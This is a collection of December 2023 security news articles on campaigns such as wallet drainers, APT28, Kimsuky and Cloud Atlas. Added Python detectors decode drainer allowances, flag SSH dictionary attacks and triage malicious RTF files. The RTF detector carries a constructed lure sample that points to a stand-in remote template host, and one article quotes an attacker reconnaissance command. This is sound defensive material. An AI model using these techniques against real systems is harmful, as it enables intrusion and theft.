ARTICLES December  2023 (100)




Beware: Scam-as-a-Service Aiding Cybercriminals in Crypto Wallet-Draining Attacks
31.12.23  Cryptocurrency  The Hacker News

Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets.

"These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said.

A prominent contributor to this troubling trend is a notorious phishing group called Angel Drainer, which advertises a "scam-as-a-service" offering by charging a percentage of the stolen amount, typically 20% or 30%, from its collaborators in return for providing wallet-draining scripts and other services.

In late November 2023, a similar wallet-draining service known as Inferno Drainer announced that it was shutting down its operations for good after helping scammers plunder over $70 million worth of crypto from 103,676 victims since its launch in late 2022.

Web3 anti-scam solution provider Scam Sniffer, in May 2023, described the vendor as specializing in multi-chain scams and charging 20% of the stolen assets.

"It has been a long ride with all of you and we'd like to thank you from heart [sic]," the actor said in a message posted on its Telegram channel.

"A big thanks to everyone who has worked with us such as Drakan and every other customer, we hope you can remember us as the best drainer that has ever existed and that we succeeded in helping you in the quest of making money."

At the crux of these services is a crypto-draining kit that's crafted to facilitate cyber theft by illegally transferring cryptocurrency from victims' wallets without their consent.

This is typically accomplished via airdrop or phishing scams, tricking targets into connecting their wallets on counterfeit websites that are propagated via malvertising schemes or unsolicited emails and messages on social media.

Earlier this month, Scam Sniffer detailed a phishing scam in which bogus ads for cryptocurrency platforms on Google and X (formerly Twitter) redirected users to sketchy sites that drained funds from users' digital wallets.

"The user is induced to interact with a malicious smart contract under the guise of claiming the airdrop, which stealthily increases the attacker's allowance through functions like approve or permit," Check Point noted.

"Unknowingly, the user grants the attacker access to their funds, enabling token theft without further user interaction. Attackers then use methods like mixers or multiple transfers to obscure their tracks and liquidate the stolen assets."

To mitigate the risks posed by such scams, users are recommended to employ hardware wallets for enhanced security, verify the legitimacy of smart contracts, and periodically review wallet allowances for signs of any suspicious activity.
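The "approve or permit" step above is where a drainer gets its foothold: the victim signs one transaction that raises the attacker's allowance, and everything after that needs no further interaction. The following is an added example (it is not code from Check Point, Scam Sniffer, or any wallet vendor) that decodes an ERC-20 `approve(address,uint256)` or EIP-2612 `permit(...)` call before it is signed and flags an allowance to an unknown spender. The function selectors (0x095ea7b3 and 0xd505accf) are the standard ones; the 2^128 "effectively unlimited" threshold, the `review` verdict strings, and the spender address used as sample input are assumptions made for the example.

```python
# Added example: decode ERC-20 approve()/permit() calldata and flag allowances
# that would let a spender drain the token balance.
# Selectors are the first 4 bytes of keccak256 over the function signature:
#   approve(address,uint256)                                       -> 0x095ea7b3
#   permit(address,address,uint256,uint256,uint8,bytes32,bytes32) -> 0xd505accf (EIP-2612)
from dataclasses import dataclass
from typing import Optional

APPROVE_SELECTOR = bytes.fromhex("095ea7b3")
PERMIT_SELECTOR = bytes.fromhex("d505accf")
UINT256_MAX = (1 << 256) - 1
UNLIMITED_THRESHOLD = 1 << 128   # assumed cut-off for "effectively unlimited"


@dataclass
class AllowanceRequest:
    function: str
    owner: Optional[str]   # only present for permit()
    spender: str
    amount: int

    @property
    def unlimited(self) -> bool:
        return self.amount >= UNLIMITED_THRESHOLD


def _word(data: bytes, index: int) -> bytes:
    """Return the index-th 32-byte ABI word after the 4-byte selector."""
    start = 4 + 32 * index
    chunk = data[start:start + 32]
    if len(chunk) != 32:
        raise ValueError("calldata too short for argument %d" % index)
    return chunk


def _address(word: bytes) -> str:
    # Addresses are right-aligned in the word; the top 12 bytes must be zero.
    if any(word[:12]):
        raise ValueError("non-zero padding in address word")
    return "0x" + word[12:].hex()


def decode_allowance_call(calldata_hex: str) -> Optional[AllowanceRequest]:
    """Decode approve()/permit() calldata; return None for any other function."""
    data = bytes.fromhex(calldata_hex[2:] if calldata_hex.startswith("0x") else calldata_hex)
    selector = data[:4]
    if selector == APPROVE_SELECTOR:
        return AllowanceRequest("approve", None, _address(_word(data, 0)),
                                int.from_bytes(_word(data, 1), "big"))
    if selector == PERMIT_SELECTOR:
        return AllowanceRequest("permit", _address(_word(data, 0)), _address(_word(data, 1)),
                                int.from_bytes(_word(data, 2), "big"))
    return None


def encode_approve(spender: str, amount: int) -> str:
    """Build approve() calldata (used here only to construct sample input)."""
    spender_word = bytes(12) + bytes.fromhex(spender[2:])
    return "0x" + (APPROVE_SELECTOR + spender_word + amount.to_bytes(32, "big")).hex()


def review(calldata_hex: str, trusted_spenders: set) -> str:
    """Return a verdict a wallet UI could show before the user signs."""
    req = decode_allowance_call(calldata_hex)
    if req is None:
        return "not an allowance change"
    if req.spender.lower() not in {s.lower() for s in trusted_spenders}:
        amount = "UNLIMITED allowance" if req.unlimited else str(req.amount)
        return "BLOCK: %s grants %s to unknown spender %s" % (req.function, amount, req.spender)
    return "ok: %s of %s to trusted spender" % (req.function, req.amount)


if __name__ == "__main__":
    # Constructed sample: a drainer contract asking for an unlimited approval.
    drainer = "0x000000000000000000000000000000000000dead"
    print(review(encode_approve(drainer, UINT256_MAX), trusted_spenders=set()))
```

A `permit` is usually signed off-chain as EIP-712 typed data and relayed by the attacker, so the same spender-and-amount check should be applied to the typed-data prompt, not only to on-chain calldata. Existing allowances can be found by scanning past `Approval` events for the wallet and revoked by sending `approve(spender, 0)`.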


Albanian Parliament and One Albania Telecom Hit by Cyber Attacks
29.12.23  BigBrothers  The Hacker News

The Assembly of the Republic of Albania and telecom company One Albania have been targeted by cyber attacks, the country's National Authority for Electronic Certification and Cyber Security (AKCESK) revealed this week.

"These infrastructures, under the legislation in force, are not currently classified as critical or important information infrastructure," AKCESK said.

One Albania, which has nearly 1.5 million subscribers, said in a Facebook post on December 25 that it had handled the security incident without any issues and that its services, including mobile, landline, and IPTV, remained unaffected.

AKCESK further noted that the intrusions did not originate from Albanian IP addresses, adding it managed to "identify potential cases in real-time."

The agency also said that it has been focusing its efforts on identifying the source of the attacks, recovering compromised systems, and implementing security measures to prevent such incidents from happening again in the future.

What's more, AKCESK said the incident has prompted it to review and strengthen its cybersecurity strategies.

The exact scale and scope of the attacks are currently not known, but an Iranian hacker group called Homeland Justice claimed responsibility on its Telegram channel and also claimed to have hacked the flag carrier airline Air Albania.


In a message shared on its website on December 24, the outfit said it is "back to destroy supporters of terrorists," and appended the following tags: #albania, #albaniahack, #CyberAttacks, #mek, #MKO, #ncri, #NLA, #pmoi, #Terrorists.

The development comes more than a year after Albanian government services were targeted by destructive cyber attacks in mid-July 2022.

Homeland Justice claimed responsibility for those attacks as well. The development subsequently prompted the U.S. government to sanction Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmail Khatib, for engaging in cyber-enabled activities against the U.S. and its allies.


CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK
29.12.23  Virus  The Hacker News

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.

The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document.

In reality, the links lead to malicious web resources that use JavaScript and the "search-ms:" URI protocol handler to present a Windows shortcut file (LNK); opening it launches PowerShell commands that start the infection chain for a new malware known as MASEPIE.

MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol.

The attacks further pave the way for the deployment of additional malware, including a PowerShell script called STEELHOOK that's capable of harvesting web browser data and exporting it to an actor-controlled server in Base64-encoded format.

Also delivered is a C#-based backdoor dubbed OCEANMAP that's designed to execute commands using cmd.exe.

"The IMAP protocol is used as a control channel," CERT-UA said, adding persistence is achieved by creating a URL file named "VMSearch.url" in the Windows Startup folder.

"Commands, in Base64-encoded form, are contained in the 'Drafts' of the corresponding email directories; each of the drafts contains the name of the computer, the name of the user and the version of the OS. The results of the commands are stored in the inbox directory."

The agency further pointed out that reconnaissance and lateral movement activities are carried out within an hour of the initial compromise by taking advantage of tools like Impacket and SMBExec.

The disclosure comes weeks after IBM X-Force revealed APT28's use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.

In recent weeks, the prolific Kremlin-backed hacking group has also been attributed to the exploitation of a now-patched critical security flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims' accounts on Exchange servers.


Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks
29.12.23  APT  The Hacker News

Nation-state actors affiliated with North Korea have been observed using spear-phishing attacks to deliver an assortment of backdoors and tools such as AppleSeed, Meterpreter, and TinyNuke to seize control of compromised machines.

South Korea-based cybersecurity company AhnLab attributed the activity to an advanced persistent threat group known as Kimsuky.

"A notable point about attacks that use AppleSeed is that similar methods of attack have been used for many years with no significant changes to the malware that are used together," the AhnLab Security Emergency Response Center (ASEC) said in an analysis published Thursday.

Kimsuky, active for over a decade, is known for its targeting of a wide range of entities in South Korea, before expanding its focus to include other geographies in 2017. It was sanctioned by the U.S. government late last month for amassing intelligence to support North Korea's strategic objectives.

The threat actor's espionage campaigns are realized through spear-phishing attacks containing malicious lure documents that, upon opening, culminate in the deployment of various malware families.

One such prominent Windows-based backdoor used by Kimsuky is AppleSeed (aka JamBog), a DLL-based malware in use since at least May 2019 that has since gained an Android version as well as a new variant written in Golang called AlphaSeed.

AppleSeed is designed to receive instructions from an actor-controlled server, drop additional payloads, and exfiltrate sensitive data such as files, keystrokes, and screenshots. AlphaSeed, like AppleSeed, incorporates similar features but has some crucial differences as well.

"AlphaSeed was developed in Golang and uses chromedp for communications with the [command-and-control] server," ASEC said, in contrast to AppleSeed, which relies on HTTP or SMTP protocols. Chromedp is a popular Golang library for interacting with the Google Chrome browser in headless mode through the DevTools Protocol.

There is evidence to suggest that Kimsuky has used AlphaSeed in attacks since October 2022, with some intrusions delivering both AppleSeed and AlphaSeed to the same target system by means of a JavaScript dropper.

Also deployed by the adversary are Meterpreter and VNC-based remote access tools such as TightVNC and TinyNuke (aka Nuclear Bot), which can be leveraged to take control of the affected system.

The development comes as Nisos said it discovered a number of online personas on LinkedIn and GitHub likely used by North Korea's information technology (IT) workers to fraudulently obtain remote employment from companies in the U.S. The scheme acts as a revenue stream for the regime and helps fund its economic and security priorities.

"The personas often claimed to be proficient in developing several different types of applications and have experience working with crypto and blockchain transactions," the threat intelligence firm said in a report released earlier this month.

"Further, all of the personas sought remote-only positions in the technology sector and were singularly focused on obtaining new employment. Many of the accounts are only active for a short period of time before they are disabled."

North Korean actors, in recent years, have launched a series of multi-pronged assaults, blending novel tactics and supply chain weaknesses to target blockchain and cryptocurrency firms to facilitate the theft of intellectual property and virtual assets.

The prolific and aggressive nature of the attacks points to the different means the country has resorted to in order to evade international sanctions and illegally profit from the schemes.

"People tend to think, … how could the quote-unquote 'Hermit Kingdom' possibly be a serious player from a cyber perspective?," CrowdStrike's Adam Meyers was quoted as saying to Politico. "But the reality couldn't be further from the truth."


Microsoft Disables MSIX App Installer Protocol Widely Used in Malware Attacks
29.12.23  Virus  The Hacker News

Microsoft on Thursday said it's once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware.

"The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution," the Microsoft Threat Intelligence team said.

It further noted that several cybercriminals are offering a malware kit for sale as a service that leverages the MSIX file format and ms-appinstaller protocol handler. The changes have gone into effect in App Installer version 1.21.3421.0 or higher.

The attacks take the form of signed malicious MSIX application packages that are distributed via Microsoft Teams or malicious advertisements for legitimate popular software on search engines like Google.

At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mid-November 2023, using it as an entry point for follow-on human-operated ransomware activity -

Storm-0569, an initial access broker which propagates BATLOADER through search engine optimization (SEO) poisoning with sites spoofing Zoom, Tableau, TeamViewer, and AnyDesk, and uses the malware to deliver Cobalt Strike and hand off the access to Storm-0506 for Black Basta ransomware deployment.
Storm-1113, an initial access broker that uses bogus MSIX installers masquerading as Zoom to distribute EugenLoader (aka FakeBat), which acts as a conduit for a variety of stealer malware and remote access trojans.
Sangria Tempest (aka Carbon Spider and FIN7), which uses Storm-1113's EugenLoader to drop Carbanak that, in turn, delivers an implant called Gracewire. Alternatively, the group has relied on Google ads to lure users into downloading malicious MSIX application packages from rogue landing pages to distribute POWERTRASH, which is then used to load NetSupport RAT and Gracewire.
Storm-1674, an initial access broker that sends fake landing pages masquerading as Microsoft OneDrive and SharePoint through Teams messages using the TeamsPhisher tool, urging recipients to open PDF files that, when clicked, prompt them to update their Adobe Acrobat Reader, which downloads a malicious MSIX installer containing SectopRAT or DarkGate payloads.
Microsoft described Storm-1113 as an entity that also dabbles in "as-a-service," providing malicious installers and landing page frameworks mimicking well-known software to other threat actors such as Sangria Tempest and Storm-1674.

In October 2023, Elastic Security Labs detailed another campaign in which spurious MSIX Windows app package files for Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex were used to distribute a malware loader dubbed GHOSTPULSE.

This is not the first time Microsoft has disabled the MSIX ms-appinstaller protocol handler in Windows. In February 2022, the tech giant took the same step to prevent threat actors from weaponizing it to deliver Emotet, TrickBot, and Bazaloader.

"Threat actors have likely chosen the ms-appinstaller protocol handler vector because it can bypass mechanisms designed to help keep users safe from malware, such as Microsoft Defender SmartScreen and built-in browser warnings for downloads of executable file formats," Microsoft said.


Chinese Hackers Exploited New Zero-Day in Barracuda's ESG Appliances
27.12.23  Exploit  The Hacker News

Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy a backdoor on a "limited number" of devices.

Tracked as CVE-2023-7102, the issue is an arbitrary code execution flaw in Spreadsheet::ParseExcel, a third-party open-source Perl library used by the Amavis virus scanner within the gateway.

The company attributed the activity to a threat actor tracked by Google-owned Mandiant as UNC4841, which was previously linked to the active exploitation of another zero-day in Barracuda devices (CVE-2023-2868, CVSS score: 9.8) earlier this year.

Successful exploitation of the new flaw is accomplished by means of a specially crafted Microsoft Excel email attachment. This is followed by the deployment of new variants of known implants called SEASPY and SALTWATER that are equipped to offer persistence and command execution capabilities.

Barracuda said it released a security update that has been "automatically applied" on December 21, 2023, and that no further customer action is required.

It further pointed out that it "deployed a patch to remediate compromised ESG appliances which exhibited indicators of compromise related to the newly identified malware variants" a day later. It did not disclose the scale of the compromise.

That said, the original flaw in the Spreadsheet::ParseExcel Perl module (version 0.65) remains unpatched and has been assigned the CVE identifier CVE-2023-7101, necessitating that downstream users take appropriate remedial action.

According to Mandiant, which has been investigating the campaign, a number of private and public sector organizations located in at least 16 countries are estimated to have been impacted since October 2022.

The latest development once again speaks to UNC4841's adaptability, leveraging new tactics and techniques to retain access to high-priority targets as existing loopholes get closed.


New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices
27.12.23  OS  The Hacker News

A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices.

Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named because it's built with the open-source mobile app framework Xamarin; it abuses the operating system's accessibility permissions to fulfill its objectives.

It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after checking that the device meets the attackers' criteria.

The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said.

The cybersecurity firm said it identified 25 apps that come with this active threat, some of which were distributed on the official Google Play Store since mid-2020. The apps are estimated to have been installed at least 327,000 times.

A majority of the infections have been reported in Brazil, Argentina, the U.K., Australia, the U.S., Mexico, and other parts of Europe and the Americas. Some of the apps are listed below -

Essential Horoscope for Android (com.anomenforyou.essentialhoroscope)
3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft)
Logo Maker Pro (com.vyblystudio.dotslinkpuzzles)
Auto Click Repeater (com.autoclickrepeater.free)
Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator)
Sound Volume Extender (com.muranogames.easyworkoutsathome)
LetterLink (com.regaliusgames.llinkgame)
NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com.Ushak.NPHOROSCOPENUMBER)
Step Keeper: Easy Pedometer (com.browgames.stepkeepereasymeter)
Track Your Sleep (com.shvetsStudio.trackYourSleep)
Sound Volume Booster (com.devapps.soundvolumebooster)
Astrological Navigator: Daily Horoscope & Tarot (com.Osinko.HoroscopeTaro)
Universal Calculator (com.Potap64.universalcalculator)
Xamalicious, which typically masquerades as health, games, horoscope, and productivity apps, is the latest in a long list of malware families that abuse Android's accessibility services, asking users to grant that access upon installation so it can carry out its tasks.


"To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it's encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm," Ruiz noted.

Even more troublingly, the first-stage dropper contains functions to self-update the main Android package (APK) file, meaning it can be weaponized to act as spyware or banking trojan without any user interaction.

McAfee said it identified a link between Xamalicious and an ad-fraud app named Cash Magnet, which facilitates app download and automated clicker activity to illicitly earn revenue by clicking on ads.

"Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets," Ruiz said.


Android Phishing Campaign Targets India With Banker Malware
The disclosure comes as the cybersecurity company detailed a phishing campaign that employs social messaging apps like WhatsApp to distribute rogue APK files that impersonate legitimate banks such as the State Bank of India (SBI) and prompt the user to install them to complete a mandatory Know Your Customer (KYC) procedure.

Once installed, the app asks the user to grant it SMS-related permissions and redirects to a fake page that captures not only the victim's credentials but also their account, credit/debit card, and national identity information.

The harvested data, alongside the intercepted SMS messages, are forwarded to an actor-controlled server, thereby allowing the adversary to complete unauthorized transactions.

It's worth noting that Microsoft last month warned of a similar campaign that utilizes WhatsApp and Telegram as distribution vectors to target Indian online banking users.

"India underscores the acute threat posed by this banking malware within the country's digital landscape, with a few hits found elsewhere in the world, possibly from Indian SBI users living in other countries," researchers Neil Tyagi and Ruiz said.


Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining
27.12.23  Cryptocurrency  The Hacker News

Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks.

"Threat actors can also choose to install only scanners and sell the breached IP and account credentials on the dark web," the AhnLab Security Emergency Response Center (ASEC) said in a report on Tuesday.

In these attacks, adversaries try to guess a server's SSH credentials by running through a list of commonly used username and password combinations, a technique known as a dictionary attack.

Should the brute-force attempt be successful, it's followed by the threat actor deploying other malware, including scanners, to scan for other susceptible systems on the internet.

Specifically, the scanner is designed to look for systems where port 22 -- which is associated with the SSH service -- is active and then repeats the process of staging a dictionary attack in order to install malware, effectively propagating the infection.

Another notable aspect of the attack is the execution of commands such as "grep -c ^processor /proc/cpuinfo" to determine the number of CPU cores.

"These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before using them in attacks," ASEC said, adding there is evidence of such malicious software being used as early as 2021.

To mitigate the risks associated with these attacks, it's recommended that users rely on passwords that are hard to guess, periodically rotate them, and keep their systems up-to-date.
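The dictionary attack described above leaves a very recognizable trace in the OpenSSH log: a burst of "Failed password" lines from one source address cycling through common usernames, followed, if the attack works, by an "Accepted password" line from the same address. The following is an added example, not code from ASEC or any product, that runs that detection over constructed sample auth.log lines. The line format is the standard sshd syslog format; the 10-failures-in-5-minutes threshold, the hostnames and the addresses are assumptions made for the example.

```python
# Added example: detect an SSH dictionary attack from OpenSSH auth log lines and
# report whether it succeeded. Log lines are constructed for the example.
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>\S+) port \d+')

SAMPLE_LOG = """\
Dec 26 03:14:01 web1 sshd[2210]: Failed password for root from 198.51.100.23 port 51022 ssh2
Dec 26 03:14:03 web1 sshd[2212]: Failed password for invalid user admin from 198.51.100.23 port 51030 ssh2
Dec 26 03:14:05 web1 sshd[2214]: Failed password for invalid user test from 198.51.100.23 port 51041 ssh2
Dec 26 03:14:08 web1 sshd[2216]: Failed password for invalid user oracle from 198.51.100.23 port 51055 ssh2
Dec 26 03:14:10 web1 sshd[2218]: Failed password for invalid user ubuntu from 198.51.100.23 port 51060 ssh2
Dec 26 03:14:12 web1 sshd[2220]: Failed password for invalid user pi from 198.51.100.23 port 51071 ssh2
Dec 26 03:14:15 web1 sshd[2222]: Failed password for invalid user git from 198.51.100.23 port 51080 ssh2
Dec 26 03:14:17 web1 sshd[2224]: Failed password for root from 198.51.100.23 port 51094 ssh2
Dec 26 03:14:20 web1 sshd[2226]: Failed password for invalid user user from 198.51.100.23 port 51102 ssh2
Dec 26 03:14:22 web1 sshd[2228]: Failed password for invalid user postgres from 198.51.100.23 port 51110 ssh2
Dec 26 03:14:25 web1 sshd[2230]: Failed password for root from 198.51.100.23 port 51121 ssh2
Dec 26 03:14:27 web1 sshd[2232]: Failed password for invalid user deploy from 198.51.100.23 port 51133 ssh2
Dec 26 03:14:30 web1 sshd[2234]: Accepted password for root from 198.51.100.23 port 51140 ssh2
Dec 26 03:20:11 web1 sshd[2301]: Failed password for alice from 192.0.2.5 port 40210 ssh2
Dec 26 03:20:19 web1 sshd[2301]: Accepted password for alice from 192.0.2.5 port 40210 ssh2
"""


def parse(lines, year=2023):
    """Yield parsed sshd password events; lines that don't match are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so one is supplied by the caller
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
        yield {"ts": ts, "result": m.group("result"), "user": m.group("user"), "ip": m.group("ip")}


def detect(lines, window_seconds=300, threshold=10, year=2023):
    """Return one alert per source IP with >= threshold failures inside any
    window_seconds window; a later success from that IP records the account
    that was guessed."""
    recent = defaultdict(list)   # ip -> [(ts, user)] inside the sliding window
    total = defaultdict(int)     # ip -> failures seen so far
    alerts = {}
    for ev in parse(lines, year):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            total[ip] += 1
            bucket = recent[ip]
            bucket.append((ev["ts"], ev["user"]))
            bucket[:] = [(t, u) for t, u in bucket
                         if (ev["ts"] - t).total_seconds() <= window_seconds]
            if len(bucket) >= threshold:
                a = alerts.setdefault(ip, {"ip": ip, "failures": 0, "users": set(),
                                           "compromised_user": None})
                a["failures"] = total[ip]
                a["users"].update(u for _, u in bucket)
        elif ip in alerts:
            # a success from an address that was just guessing is the real emergency
            alerts[ip]["compromised_user"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print("%s: %d failures over %d usernames, compromised account: %s" % (
            alert["ip"], alert["failures"], len(alert["users"]), alert["compromised_user"]))
```

On a host where the alert fires with a compromised account, the follow-on activity ASEC describes (port scanners, the dictionary tool, and the `grep -c ^processor /proc/cpuinfo` core count used to size the miner) is what to look for in that account's shell history and process list.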

The findings come as Kaspersky revealed that a novel multi-platform threat called NKAbuse is leveraging a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel for DDoS attacks.


Carbanak Banking Malware Resurfaces with New Ransomware Tactics
26.12.23  Virus  The Hacker News

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics.

"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.

"Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software."

Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero.

Carbanak, detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate.

In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak.

The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. A total of 4,276 cases have been reported so far this year, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."

The company's data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks.

As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play accounted for 47% (206) of the 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape in the near future.

"With one month of the year still to go, the total number of attacks has surpassed 4,000 which marks a huge increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year," Matt Hull, global head of threat intelligence at NCC Group, said.

The spike in ransomware attacks in November has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.

"The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."

While the shift is the result of a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft, last week, disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.

The development comes as Kaspersky revealed that the Akira ransomware's negotiation site includes anti-analysis measures that raise exceptions when someone opens it with the web browser's debugger attached, preventing the site from being analyzed.

The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver – CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, CVE-2023-28252 (CVSS scores: 7.8) – for privilege escalation.


Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies
26.12.23  Phishing  The Hacker News

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises.

Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year.

Cloud Atlas, active since at least 2014, is a cyber espionage group of unknown origin. Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia.

In December 2022, Check Point and Positive Technologies detailed multi-stage attack sequences that led to the deployment of a PowerShell-based backdoor referred to as PowerShower as well as DLL payloads capable of communicating with an actor-controlled server.

The starting point is a phishing message bearing a lure document that exploits CVE-2017-11882, a six-year-old memory corruption flaw in Microsoft Office's Equation Editor, to kick-start the execution of malicious payloads, a technique Cloud Atlas has employed as early as October 2018.


"The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets," Kaspersky noted in August 2019. "Unlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating."

F.A.C.C.T. described the latest kill chain as similar to the one described by Positive Technologies, with successful exploitation of CVE-2017-11882 via RTF template injection paving the way for shellcode that's responsible for downloading and running an obfuscated HTA file. The emails originate from the popular Russian email services Yandex Mail and VK's Mail.ru.

The malicious HTML application subsequently launches Visual Basic Script (VBS) files that are ultimately responsible for retrieving and executing further VBS code from a remote server.
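The first stage of the chain just described is a document, so it can be triaged statically before anyone opens it. The following is an added example, not code from F.A.C.C.T., Positive Technologies or Kaspersky, that looks inside an RTF for the two indicators the chain relies on: a `{\*\template <location>}` reference that makes Word fetch a remote template (the injection step), and an embedded Equation Editor OLE object (`\objclass Equation.3`), the component CVE-2017-11882 lives in. The control words are the documented RTF ones; the sample file, the address in it and the placeholder `\objdata` bytes are constructed for the example and are not an exploit.

```python
# Added example: static triage of an RTF lure for the indicators described above.
#   {\*\template <url>}   remote template reference: Word fetches a second-stage
#                         template from that location when the file opens
#   \objclass Equation.3  embedded Equation Editor OLE object, the component
#                         exploited by CVE-2017-11882
#   \objupdate            forces the object to load as soon as the file opens
# The sample file is constructed; the objdata bytes are a placeholder only.
import re

TEMPLATE_RE = re.compile(rb'\\\*\\template\s+([^}]+)}', re.I)
OBJCLASS_RE = re.compile(rb'\\objclass\s+([A-Za-z0-9.]+)', re.I)
REMOTE_RE = re.compile(r'(?i)^(https?://|file://|\\\\)')

SAMPLE_RTF = (b"{\\rtf1\\ansi\\deff0"
              b"{\\*\\template http://203.0.113.7/tpl.rtf}"
              b"{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
              b"{\\*\\objdata 0105000002000000}}"
              b"\\par Quarterly report attached.}")


def triage_rtf(data: bytes) -> dict:
    """Return template references, OLE object classes and findings for one file."""
    # Real files start with {\rtf1; Word also accepts a truncated {\rt header,
    # which malicious samples use to dodge naive magic-byte checks.
    if not data.lstrip().startswith(b"{\\rt"):
        return {"is_rtf": False, "templates": [], "object_classes": [],
                "findings": [], "suspicious": False}
    templates = [m.group(1).decode("latin-1").strip() for m in TEMPLATE_RE.finditer(data)]
    classes = [m.group(1).decode("latin-1") for m in OBJCLASS_RE.finditer(data)]
    findings = []
    for t in templates:
        if REMOTE_RE.match(t):
            findings.append("remote template reference: " + t)
    for c in classes:
        if c.lower().startswith("equation"):
            findings.append("Equation Editor OLE object (%s): CVE-2017-11882 attack surface" % c)
    if b"\\objupdate" in data.lower():
        findings.append("\\objupdate present: object is activated without user interaction")
    return {"is_rtf": True, "templates": templates, "object_classes": classes,
            "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    result = triage_rtf(SAMPLE_RTF)
    for finding in result["findings"]:
        print("-", finding)
```

A remote template reference should be treated as a network indicator in its own right: the address it points to is the attacker's staging server, and the template it serves is what carries the Equation Editor object on systems where the Equation Editor component has not been removed by the November 2017 and January 2018 Office updates.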

